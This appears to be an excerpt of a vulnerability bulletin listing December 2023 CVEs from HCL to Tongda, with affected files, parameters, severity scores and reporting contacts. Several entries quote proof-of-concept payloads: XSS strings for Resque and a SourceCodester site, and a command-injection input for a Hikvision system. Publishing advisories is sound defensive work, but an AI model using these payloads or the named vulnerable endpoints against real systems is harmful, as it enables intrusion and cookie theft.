hcl_software — hcl_bigfix_mobile/modern_client_management Due to this vulnerability, the Master operator could potentially incorporate an SVG tag into HTML, leading to an alert pop-up displaying a cookie. To mitigate stored XSS vulnerabilities, a preventive measure involves thoroughly sanitizing and validating all user inputs before they are processed and stored in the server storage. 2023-12-21 6.6 CVE-2023-28025
psirt@hcl.com
hcl_software — hcl_launch HCL Launch is vulnerable to HTML injection. This vulnerability may allow a user to embed arbitrary HTML tags in the Web UI potentially leading to sensitive information disclosure. 2023-12-21 4.3 CVE-2023-45700
psirt@hcl.com
hcltech — connections HCL Connections is vulnerable to an information disclosure vulnerability which could allow a user to obtain sensitive information they are not entitled to, caused by improper handling of request data. 2023-12-15 6.5 CVE-2023-28022
psirt@hcl.com
hikvision — intercom_broadcast_system A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been classified as problematic. This affects an unknown part of the file access/html/system.html of the component Log File Handler. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-248253 was assigned to this vulnerability. 2023-12-17 6.5 CVE-2023-6894
cna@vuldb.com
hikvision — intercom_broadcasting_system A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability. 2023-12-17 6.3 CVE-2023-6895
cna@vuldb.com
hitachi_energy — rtu500_series_cmu A vulnerability exists in SCI IEC 60870-5-104 and HCI IEC 60870-5-104 that affects the RTU500 series product versions listed below. Specially crafted messages sent to the mentioned components are not validated properly and can result in a buffer overflow and, as a final consequence, a reboot of an RTU500 CMU. 2023-12-19 5.9 CVE-2023-6711
cybersecurity@hitachienergy.com
home_assistant — home_assistant Home Assistant is open source home automation software. Prior to version 2023.12.3, the login page discloses all active user accounts to any unauthenticated browsing request originating on the Local Area Network. Version 2023.12.3 contains a patch for this issue. When starting the Home Assistant 2023.12 release, the login page returns all currently active user accounts to browsing requests from the Local Area Network. Tests showed that this occurs when the request is not authenticated and the request originated locally, meaning on the Home Assistant host local subnet or any other private subnet. The rationale behind this is to make the login more user-friendly and an experience better aligned with other applications that have multiple user-profiles. However, as a result, all accounts are displayed regardless of them having logged in or not and for any device that navigates to the server. This disclosure is mitigated by the fact that it only occurs for requests originating from a LAN address. But note that this applies to the local subnet where Home Assistant resides and to any private subnet that can reach it. 2023-12-15 4.3 CVE-2023-50715
security-advisories@github.com
ibm — aix IBM AIX 7.2 and 7.3 could allow a non-privileged local user to exploit a vulnerability in the AIX SMB client to cause a denial of service. IBM X-Force ID: 267963. 2023-12-22 6.2 CVE-2023-45165
psirt@us.ibm.com
ibm — aix IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in AIX windows to cause a denial of service. IBM X-Force ID: 267970. 2023-12-19 6.2 CVE-2023-45172
psirt@us.ibm.com
ibm — cloud_pak_for_business_automation IBM Cloud Pak for Business Automation 18.0.0, 18.0.1, 18.0.2, 19.0.1, 19.0.2, 19.0.3, 20.0.1, 20.0.2, 20.0.3, 21.0.1, 21.0.2, 21.0.3, 22.0.1, and 22.0.2 may reveal sensitive information contained in application configuration to developer and administrator users. IBM X-Force ID: 264805. 2023-12-18 4.9 CVE-2023-40691
psirt@us.ibm.com
ibm — db2_mirror_for_i IBM i 7.3, 7.4, 7.5, IBM i Db2 Mirror for i 7.4 and 7.5 web browser clients may leave clear-text passwords in browser memory that can be viewed using common browser tools before the memory is garbage collected. A malicious actor with access to the victim’s PC could exploit this vulnerability to gain access to the IBM i operating system. IBM X-Force ID: 272532. 2023-12-18 5.3 CVE-2023-47741
psirt@us.ibm.com
ibm — informix_jdbc IBM Informix JDBC Driver 4.10 and 4.50 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 259116. 2023-12-20 6.3 CVE-2023-35895
psirt@us.ibm.com
ibm — qradar_siem IBM Qradar SIEM 7.5 could allow a privileged user to obtain sensitive domain information due to data being misidentified. IBM X-Force ID: 270372. 2023-12-19 4.9 CVE-2023-47146
psirt@us.ibm.com
ibm — security_guardium_key_lifecycle_manager IBM Security Guardium Key Lifecycle Manager 4.3 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 271197. 2023-12-20 5.3 CVE-2023-47703
psirt@us.ibm.com
ibm — security_guardium_key_lifecycle_manager IBM Security Guardium Key Lifecycle Manager 4.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 271522. 2023-12-20 5.4 CVE-2023-47707
psirt@us.ibm.com
ibm — security_guardium_key_lifecycle_manager IBM Security Guardium Key Lifecycle Manager 4.3 could allow an authenticated user to manipulate username data due to improper input validation. IBM X-Force ID: 271228. 2023-12-20 4.3 CVE-2023-47705
psirt@us.ibm.com
ibm — urbancode_deploy An IBM UrbanCode Deploy Agent 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 installed as a Windows service in a non-standard location could be subject to a denial of service attack by local accounts. IBM X-Force ID: 265509. 2023-12-20 6.2 CVE-2023-42012
psirt@us.ibm.com
ibm — urbancode_deploy IBM UrbanCode Deploy (UCD) 7.1 through 7.1.2.14, 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 265510. 2023-12-20 5.3 CVE-2023-42013
psirt@us.ibm.com
ibm — urbancode_deploy IBM UrbanCode Deploy (UCD) 7.1 through 7.1.2.14, 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 may mishandle input validation of an uploaded archive file leading to a denial of service due to resource exhaustion. IBM X-Force ID: 270799. 2023-12-20 5.3 CVE-2023-47161
psirt@us.ibm.com
ibm — urbancode_deploy IBM UrbanCode Deploy (UCD) 7.1 through 7.1.2.14, 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 is vulnerable to HTML injection. This vulnerability may allow a user to embed arbitrary HTML tags in the Web UI potentially leading to sensitive information disclosure. IBM X-Force ID: 265512. 2023-12-19 4.3 CVE-2023-42015
psirt@us.ibm.com
idemia — multiple_products When handling contactless cards, a specific function used to get additional information from the card does not check the boundary on the data received while reading. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device. 2023-12-15 6.8 CVE-2023-33222
a87f365f-9d39-4848-9b3a-58c7cae69cab
infinispan — infinispan A flaw was found in Infinispan’s REST. Bulk read endpoints do not properly evaluate user permissions for the operation. This issue could allow an authenticated user to access information outside of their intended permissions. 2023-12-18 6.5 CVE-2023-3628
secalert@redhat.com
infinispan — infinispan A flaw was found in Infinispan’s REST, Cache retrieval endpoints do not properly evaluate the necessary admin permissions for the operation. This issue could allow an authenticated user to access information outside of their intended permissions. 2023-12-18 4.3 CVE-2023-3629
secalert@redhat.com
infinispan — infinispan-server A flaw was found in Infinispan, which does not detect circular object references when unmarshalling. An authenticated attacker with sufficient permissions could insert a maliciously constructed object into the cache and use it to cause out of memory errors and achieve a denial of service. 2023-12-18 4.4 CVE-2023-5236
secalert@redhat.com
instipod — duouniversalkeycloakauthenticator An information disclosure vulnerability exists in the challenge functionality of the instipod DuoUniversalKeycloakAuthenticator 1.0.7 plugin. A specially crafted HTTP request can lead to a disclosure of sensitive information. A user logging in to Keycloak using the DuoUniversalKeycloakAuthenticator plugin triggers this vulnerability. 2023-12-23 4.5 CVE-2023-49594
talos-cna@cisco.com
insyde — insydeh2o TOCTOU race-condition vulnerability in Insyde InsydeH2O with Kernel 5.2 before version 05.27.29, Kernel 5.3 before version 05.36.29, Kernel 5.4 before version 05.44.13, and Kernel 5.5 before version 05.52.13 allows an attacker to alter data and code used by the remainder of the boot process. 2023-12-16 4.7 CVE-2022-24351
cve@mitre.org
iscute — cute_http_file_server Cross Site Scripting (XSS) vulnerability in CuteHttpFileServer v.1.0 and v.2.0 allows attackers to obtain sensitive information via the file upload function in the home page. 2023-12-20 5.4 CVE-2023-50639
cve@mitre.org
istanbul_soft_informatics_and_consultancy_limited_company — softomi_gelişmiş_c2c_pazaryeri_yazılımı Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in İstanbul Soft Informatics and Consultancy Limited Company Softomi Gelişmiş C2C Pazaryeri Yazılımı allows Reflected XSS. This issue affects Softomi Gelişmiş C2C Pazaryeri Yazılımı: before 12122023. 2023-12-21 6.1 CVE-2023-6122
iletisim@usom.gov.tr
jetbrains — intellij_idea In JetBrains IntelliJ IDEA before 2023.3.2 code execution was possible in Untrusted Project mode via a malicious plugin repository specified in the project configuration 2023-12-21 6.3 CVE-2023-51655
cve@jetbrains.com
jetbrains — youtrack In JetBrains YouTrack before 2023.3.22268 authorization check for inline comments inside thread replies was missed 2023-12-15 4.3 CVE-2023-50871
cve@jetbrains.com
kaifa — webitr_attendance_system Kaifa Technology WebITR is an online attendance system, it has insufficient validation for user input within a special function. A remote attacker with regular user privilege can exploit this vulnerability to inject arbitrary SQL commands to read database. 2023-12-15 6.5 CVE-2023-48395
twcert@cert.org.tw
kaifa — webitr_attendance_system Kaifa Technology WebITR is an online attendance system. A remote attacker with regular user privilege can obtain partial sensitive system information from error message. 2023-12-15 4.3 CVE-2023-48393
twcert@cert.org.tw
kashipara_group — hotel_management Hotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The ‘adults’ parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application’s response. 2023-12-20 5.4 CVE-2023-49269
help@fluidattacks.com
kashipara_group — hotel_management Hotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The ‘check_in_date’ parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application’s response. 2023-12-20 5.4 CVE-2023-49270
help@fluidattacks.com
kashipara_group — hotel_management Hotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The ‘check_out_date’ parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application’s response. 2023-12-20 5.4 CVE-2023-49271
help@fluidattacks.com
kashipara_group — hotel_management Hotel Management v1.0 is vulnerable to multiple authenticated Reflected Cross-Site Scripting vulnerabilities. The ‘children’ parameter of the reservation.php resource is copied into the HTML document as plain text between tags. Any input is echoed unmodified in the application’s response. 2023-12-20 5.4 CVE-2023-49272
help@fluidattacks.com
kodcloud — kodexplorer Reflective Cross Site Scripting (XSS) vulnerability in KodeExplorer version 4.51, allows attackers to obtain sensitive information and escalate privileges via the APP_HOST parameter at config/i18n/en/main.php. 2023-12-19 6.1 CVE-2023-49489
cve@mitre.org
libtiff — libtiff An issue was found in the tiffcp utility distributed by the libtiff package where processing a crafted TIFF file may cause a heap-based buffer overflow, leading to an application crash. 2023-12-18 5.5 CVE-2023-6228
secalert@redhat.com
lightxun — iptv_gateway A vulnerability was found in Lightxun IPTV Gateway up to 20231208. It has been rated as problematic. This issue affects some unknown processing of the file /ZHGXTV/index.php/admin/index/web_upload_template.html. The manipulation of the argument file leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248579. 2023-12-21 4.3 CVE-2023-7026
cna@vuldb.com
linux — kernel A null pointer dereference vulnerability was found in ath10k_wmi_tlv_op_pull_mgmt_tx_compl_ev() in drivers/net/wireless/ath/ath10k/wmi-tlv.c in the Linux kernel. This issue could be exploited to trigger a denial of service. 2023-12-21 4.4 CVE-2023-7042
secalert@redhat.com
m-files_corporation — m-files_server A vulnerable API method in M-Files Server before 23.12.13195.0 allows for uncontrolled resource consumption. Authenticated attacker can exhaust server storage space to a point where the server can no longer serve requests. 2023-12-20 6.5 CVE-2023-6910
security@m-files.com
microsoft — edge_chromium Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability 2023-12-15 4.3 CVE-2023-36878
secure@microsoft.com
microsoft — windows Windows Local Session Manager (LSM) Denial of Service Vulnerability 2023-12-20 6.5 CVE-2022-44684
secure@microsoft.com
microweber — microweber Business Logic Errors in GitHub repository microweber/microweber prior to 2.0. 2023-12-15 4.3 CVE-2023-6832
security@huntr.dev
moxa — iologik_e1200_series A weak cryptographic algorithm vulnerability has been identified in ioLogik E1200 Series firmware versions v3.3 and prior. This vulnerability can help an attacker compromise the confidentiality of sensitive data. This vulnerability may lead an attacker to get unexpected authorization. 2023-12-23 6.5 CVE-2023-5962
psirt@moxa.com
mozilla — firefox A `<dialog>` element could have been manipulated to paint content outside of a sandboxed iframe. This could allow untrusted content to display under the guise of trusted content. This vulnerability affects Firefox < 121. 2023-12-19 6.5 CVE-2023-6869
security@mozilla.org
mozilla — firefox Browser tab titles were being leaked by GNOME to system logs. This could potentially expose the browsing habits of users running in a private tab. This vulnerability affects Firefox < 121. 2023-12-19 6.5 CVE-2023-6872
security@mozilla.org
mozilla — firefox Multiple NSS NIST curves were susceptible to a side-channel attack known as “Minerva”. This attack could potentially allow an attacker to recover the private key. This vulnerability affects Firefox < 121. 2023-12-19 4.3 CVE-2023-6135
security@mozilla.org
mozilla — firefox In some instances, the user-agent would allow push requests which lacked a valid VAPID even though the push manager subscription defined one. This could allow empty messages to be sent from unauthorized parties. *This bug only affects Firefox on Android.* This vulnerability affects Firefox < 121. 2023-12-19 4.3 CVE-2023-6868
security@mozilla.org
mozilla — firefox Applications which spawn a Toast notification in a background thread may have obscured fullscreen notifications displayed by Firefox. *This issue only affects Android versions of Firefox and Firefox Focus.* This vulnerability affects Firefox < 121. 2023-12-19 4.3 CVE-2023-6870
security@mozilla.org
mozilla — firefox Under certain conditions, Firefox did not display a warning when a user attempted to navigate to a new protocol handler. This vulnerability affects Firefox < 121. 2023-12-19 4.3 CVE-2023-6871
security@mozilla.org
mozilla — firefox/firefox_esr `EncryptingOutputStream` was susceptible to exposing uninitialized data. This issue could only be abused in order to write data to a local disk which may have implications for private browsing mode. This vulnerability affects Firefox ESR < 115.6 and Firefox < 121. 2023-12-19 6.5 CVE-2023-6865
security@mozilla.org
mozilla — firefox/firefox_esr The timing of a button click causing a popup to disappear was approximately the same length as the anti-clickjacking delay on permission prompts. It was possible to use this fact to surprise users by luring them to click where the permission grant button would be about to appear. This vulnerability affects Firefox ESR < 115.6 and Firefox < 121. 2023-12-19 6.1 CVE-2023-6867
security@mozilla.org
mozilla — multiple_products The `VideoBridge` allowed any content process to use textures produced by remote decoders. This could be abused to escape the sandbox. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. 2023-12-19 6.5 CVE-2023-6860
security@mozilla.org
mozilla — multiple_products When resolving a symlink, a race may occur where the buffer passed to `readlink` may actually be smaller than necessary. *This bug only affects Firefox on Unix-based operating systems (Android, Linux, MacOS). Windows is unaffected.* This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. 2023-12-19 5.3 CVE-2023-6857
security@mozilla.org
mozilla — thunderbird The signature of a digitally signed S/MIME email message may optionally specify the signature creation date and time. If present, Thunderbird did not compare the signature creation date with the message date and time, and displayed a valid signature despite a date or time mismatch. This could be used to give recipients the impression that a message was sent at a different date or time. This vulnerability affects Thunderbird < 115.6. 2023-12-19 4.3 CVE-2023-50761
security@mozilla.org
mozilla — thunderbird When processing a PGP/MIME payload that contains digitally signed text, the first paragraph of the text was never shown to the user. This is because the text was interpreted as a MIME message and the first paragraph was always treated as an email header section. A digitally signed text from a different context, such as a signed GIT commit, could be used to spoof an email message. This vulnerability affects Thunderbird < 115.6. 2023-12-19 4.3 CVE-2023-50762
security@mozilla.org
mr-corner — amazing_little_poll Stored XSS vulnerability in Amazing Little Poll, affecting versions 1.3 and 1.4. This vulnerability allows a remote attacker to store a malicious JavaScript payload in the “lp_admin.php” file in the “question” and “item” parameters. This vulnerability could lead to malicious JavaScript execution while the page is loading. 2023-12-20 4.6 CVE-2023-6769
cve-coordination@incibe.es
netapp — ontap ONTAP 9 versions 9.12.1P8, 9.13.1P4, and 9.13.1P5 are susceptible to a vulnerability which will cause all SAS-attached FIPS 140-2 drives to become unlocked after a system reboot or power cycle or a single SAS-attached FIPS 140-2 drive to become unlocked after reinsertion. This could lead to disclosure of sensitive information to an attacker with physical access to the unlocked drives. 2023-12-15 4.6 CVE-2023-27317
security-alert@netapp.com
netapp — ontap_mediator ONTAP Mediator versions prior to 1.7 are susceptible to a vulnerability that can allow an unauthenticated attacker to enumerate URLs via REST API. 2023-12-21 5.3 CVE-2023-27319
security-alert@netapp.com
nextcloud — security-advisories Nextcloud Server provides data storage for Nextcloud, an open source cloud platform. In Nextcloud Server prior to versions 26.0.9 and 27.1.4; as well as Nextcloud Enterprise Server prior to versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4; when an attacker manages to get access to an active session of another user via another way, they could delete and modify workflows by sending calls directly to the API bypassing the password confirmation shown in the UI. Nextcloud Server versions 26.0.9 and 27.1.4 and Nextcloud Enterprise Server versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4 contain a patch for this issue. No known workarounds are available. 2023-12-22 5.4 CVE-2023-49791
security-advisories@github.com
nextcloud — security-advisories Nextcloud Server provides data storage for Nextcloud, an open source cloud platform. In Nextcloud Server prior to versions 26.0.9 and 27.1.4; as well as Nextcloud Enterprise Server prior to versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4; when a (reverse) proxy is configured as a trusted proxy, the server could be tricked into reading a wrong remote address for an attacker, allowing them to execute more authentication attempts than intended. Nextcloud Server versions 26.0.9 and 27.1.4 and Nextcloud Enterprise Server versions 23.0.12.13, 24.0.12.9, 25.0.13.4, 26.0.9, and 27.1.4 contain a patch for this issue. No known workarounds are available. 2023-12-22 5.3 CVE-2023-49792
security-advisories@github.com
nextcloud — security-advisories The Nextcloud iOS Files app allows users of iOS to interact with Nextcloud, a self-hosted productivity platform. Prior to version 4.9.2, the application can be used without providing the 4 digit PIN code. Nextcloud iOS Files app should be upgraded to 4.9.2 to receive the patch. No known workarounds are available. 2023-12-22 4.3 CVE-2023-49790
security-advisories@github.com
openbsd — openssh In ssh-agent in OpenSSH before 9.6, certain destination constraints can be incompletely applied. When destination constraints are specified during addition of PKCS#11-hosted private keys, these constraints are only applied to the first key, even if a PKCS#11 token returns multiple keys. 2023-12-18 5.5 CVE-2023-51384
cve@mitre.org
pedroetb — tts-api A vulnerability has been found in pedroetb tts-api up to 2.1.4 and classified as critical. This vulnerability affects the function onSpeechDone of the file app.js. The manipulation leads to os command injection. Upgrading to version 2.2.0 is able to address this issue. The patch is identified as 29d9c25415911ea2f8b6de247cb5c4607d13d434. It is recommended to upgrade the affected component. VDB-248278 is the identifier assigned to this vulnerability. 2023-12-19 5.5 CVE-2019-25158
cna@vuldb.com
phpgurukul — online_notes_sharing_system A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /user/add-notes.php. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248741 was assigned to this vulnerability. 2023-12-22 5.5 CVE-2023-7054
cna@vuldb.com
phpgurukul — online_notes_sharing_system A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /user/manage-notes.php of the component Notes Handler. The manipulation of the argument delid leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248738 is the identifier assigned to this vulnerability. 2023-12-21 4.3 CVE-2023-7051
cna@vuldb.com
phpgurukul — online_notes_sharing_system A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been classified as problematic. This affects an unknown part of the file /user/profile.php. The manipulation of the argument name leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248739. 2023-12-22 4.3 CVE-2023-7052
cna@vuldb.com
phpgurukul — online_notes_sharing_system A vulnerability classified as problematic has been found in PHPGurukul Online Notes Sharing System 1.0. Affected is an unknown function of the file /user/profile.php of the component Contact Information Handler. The manipulation of the argument mobilenumber leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-248742 is the identifier assigned to this vulnerability. 2023-12-22 4.3 CVE-2023-7055
cna@vuldb.com
phpmyfaq — phpmyfaq Cross-site Scripting (XSS) – Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.17. 2023-12-16 5.4 CVE-2023-6889
security@huntr.dev
phpmyfaq — phpmyfaq Cross-site Scripting (XSS) – Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.17. 2023-12-16 5.4 CVE-2023-6890
security@huntr.dev
progress_software_corporation — sitefinity A malicious user could potentially use the Sitefinity system for the distribution of phishing emails. 2023-12-20 4.7 CVE-2023-6784
security@progress.com
pymedusa — medusa Medusa is an automatic video library manager for TV shows. Versions prior to 1.0.19 are vulnerable to unauthenticated blind server-side request forgery (SSRF). The `testDiscord` request handler in `medusa/server/web/home/handler.py` does not validate the user-controlled `discord_webhook` variable and passes it to the `notifiers.discord_notifier.test_notify` method, then `_notify_discord` and finally `_send_discord_msg` method, which sends a POST request to the user-controlled URL on line 64 in `/medusa/notifiers/discord.py`, which leads to a blind server-side request forgery. This issue allows for crafting POST requests on behalf of the Medusa server. Version 1.0.19 contains a fix for the issue. 2023-12-22 5.3 CVE-2023-50258
security-advisories@github.com
pymedusa — medusa Medusa is an automatic video library manager for TV shows. Versions prior to 1.0.19 are vulnerable to unauthenticated blind server-side request forgery (SSRF). The `testslack` request handler in `medusa/server/web/home/handler.py` does not validate the user-controlled `slack_webhook` variable and passes it to the `notifiers.slack_notifier.test_notify` method, then `_notify_slack` and finally `_send_slack` method, which sends a POST request to the user-controlled URL on line 103 in `/medusa/notifiers/slack.py`, which leads to a blind server-side request forgery (SSRF). This issue allows for crafting POST requests on behalf of the Medusa server. Version 1.0.19 contains a fix for the issue. 2023-12-22 5.3 CVE-2023-50259
security-advisories@github.com
redhat — keycloak A flaw was found in Keycloak. This issue may allow an attacker to steal authorization codes or tokens from clients using a wildcard in the JARM response mode “form_post.jwt” which could be used to bypass the security patch implemented to address CVE-2023-6134. 2023-12-18 6.1 CVE-2023-6927
secalert@redhat.com
resque — resque Resque (pronounced like “rescue”) is a Redis-backed library for creating background jobs, placing those jobs on multiple queues, and processing them later. resque-web in resque versions before 2.1.0 are vulnerable to reflected XSS through the current_queue parameter in the path of the queues endpoint. This issue has been patched in version 2.1.0. 2023-12-21 6.3 CVE-2023-50724
security-advisories@github.com
resque — resque Resque is a Redis-backed Ruby library for creating background jobs, placing them on multiple queues, and processing them later. The following paths in resque-web have been found to be vulnerable to reflected XSS: “/failed/?class=<script>alert(document.cookie)</script>” and “/queues/><img src=a onerror=alert(document.cookie)>”. This issue has been patched in version 2.2.1. 2023-12-22 6.3 CVE-2023-50725
security-advisories@github.com
resque — resque Resque is a Redis-backed Ruby library for creating background jobs, placing them on multiple queues, and processing them later. Reflected XSS issue occurs when /queues is appended with /”><svg%20onload=alert(domain)>. This issue has been patched in version 2.6.0. 2023-12-22 6.3 CVE-2023-50727
security-advisories@github.com
satellite — satellite An arithmetic overflow flaw was found in Satellite when creating a new personal access token. This flaw allows an attacker who uses this arithmetic overflow to create personal access tokens that are valid indefinitely, resulting in damage to the system’s integrity. 2023-12-18 6 CVE-2023-4320
secalert@redhat.com
silabs — z-wave_software_development_kit A denial of service vulnerability exists in all Silicon Labs Z-Wave controller and endpoint devices running Z-Wave SDK v7.20.3 (Gecko SDK v4.3.3) and earlier. This attack can be carried out only by devices on the network sending a stream of packets to the device. 2023-12-15 6.5 CVE-2023-5310
product-security@silabs.com
silicon_labs — gsdk An Observable Timing Discrepancy, Covert Timing Channel vulnerability in Silabs GSDK on ARM potentially allows Padding Oracle Crypto Attack on CBC PKCS7. This issue affects GSDK: through 4.4.0. 2023-12-21 4.6 CVE-2023-41097
product-security@silabs.com
skupper_operator — skupper_operator A flaw was found in the Skupper operator, which may permit a certain configuration to create a service account that would allow an authenticated attacker in the adjacent cluster to view deployments in all namespaces in the cluster. This issue permits unauthorized viewing of information outside of the user’s purview. 2023-12-18 6.8 CVE-2023-5056
secalert@redhat.com
snowflakedb — snowflake-connector-net The Snowflake .NET driver provides an interface to the Microsoft .NET open source software framework for developing applications. Snowflake recently received a report about a vulnerability in the Snowflake Connector .NET where the checks against the Certificate Revocation List (CRL) were not performed where the insecureMode flag was set to false, which is the default setting. The vulnerability affects versions between 2.0.25 and 2.1.4 (inclusive). Snowflake fixed the issue in version 2.1.5. 2023-12-22 6 CVE-2023-51662
security-advisories@github.com
softnext — mail_sqr_expert Softnext Mail SQR Expert is an email management platform, it has a Local File Inclusion (LFI) vulnerability in a special URL. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary PHP file with .asp file extension under specific system paths, to access and modify partial system information but does not affect service availability. 2023-12-15 6.5 CVE-2023-48381
twcert@cert.org.tw
softnext — mail_sqr_expert Softnext Mail SQR Expert is an email management platform, it has a Local File Inclusion (LFI) vulnerability in a mail deliver-related URL. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary PHP file with .asp file extension under specific system paths, to access and modify partial system information but does not affect service availability. 2023-12-15 6.5 CVE-2023-48382
twcert@cert.org.tw
softnext — mail_sqr_expert Softnext Mail SQR Expert is an email management platform. It has inadequate filtering for a specific URL parameter within a specific function. An unauthenticated remote attacker can perform a Blind SSRF attack to discover internal network topology based on URL error responses. 2023-12-15 5.3 CVE-2023-48379
twcert@cert.org.tw
sourcecodester — simple_image_stack_website A vulnerability was found in SourceCodester Simple Image Stack Website 1.0. It has been rated as problematic. This issue affects some unknown processing. The manipulation of the argument search with the input sy2ap%22%3e%3cscript%3ealert(1)%3c%2fscript%3etkxh1 leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248255. 2023-12-17 6.1 CVE-2023-6896
cna@vuldb.com
sourcecodester — simple_student_attendance_system A vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation of the argument page leads to path traversal: ‘../filedir’. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248749 was assigned to this vulnerability. 2023-12-22 6.3 CVE-2023-7058
cna@vuldb.com
sudo — sudo A flaw was found in sudo in the handling of ipa_hostname, where ipa_hostname from /etc/sssd/sssd.conf was not propagated in sudo. Therefore, it leads to privilege mismanagement vulnerability in applications, where client hosts retain privileges even after retracting them. 2023-12-23 6.6 CVE-2023-7090
secalert@redhat.com
systemd-resolved — systemd-resolved A vulnerability was found in systemd-resolved. This issue may allow systemd-resolved to accept records of DNSSEC-signed domains even when they have no signature, allowing man-in-the-middles (or the upstream DNS resolver) to manipulate records. 2023-12-23 5.9 CVE-2023-7008
secalert@redhat.com
taiwan-ca — jcicsecuritytool TAIWAN-CA(TWCA) JCICSecurityTool’s Registry-related functions have insufficient filtering for special characters. An unauthenticated remote attacker can inject malicious script into a webpage to perform XSS (Stored Cross-Site Scripting) attack. 2023-12-15 6.1 CVE-2023-48387
twcert@cert.org.tw
tcpreplay — tcpreplay Within tcpreplay’s tcprewrite, a double free vulnerability has been identified in the tcpedit_dlt_cleanup() function within plugins/dlt_plugins.c. This vulnerability can be exploited by supplying a specifically crafted file to the tcprewrite binary. This flaw enables a local attacker to initiate a Denial of Service (DoS) attack. 2023-12-21 5.5 CVE-2023-4256
secalert@redhat.com
tongda — tongda_office_anywhere A vulnerability was found in Tongda OA 2017 up to 11.9 and classified as critical. This issue affects some unknown processing of the file general/wiki/cp/ct/view.php. The manipulation of the argument TEMP_ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248567. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-21 6.3 CVE-2023-7020
cna@vuldb.com
tongda — tongda_office_anywhere A vulnerability was found in Tongda OA 2017 up to 11.9. It has been classified as critical. Affected is an unknown function of the file general/vehicle/checkup/delete_search.php. The manipulation of the argument VU_ID leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248568. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-21 6.3 CVE-2023-7021
cna@vuldb.com
tongda — tongda_office_anywhere A vulnerability was found in Tongda OA 2017 up to 11.9. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file general/work_plan/manage/delete_all.php. The manipulation of the argument DELETE_STR leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248569 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-21 6.3 CVE-2023-7022
cna@vuldb.com
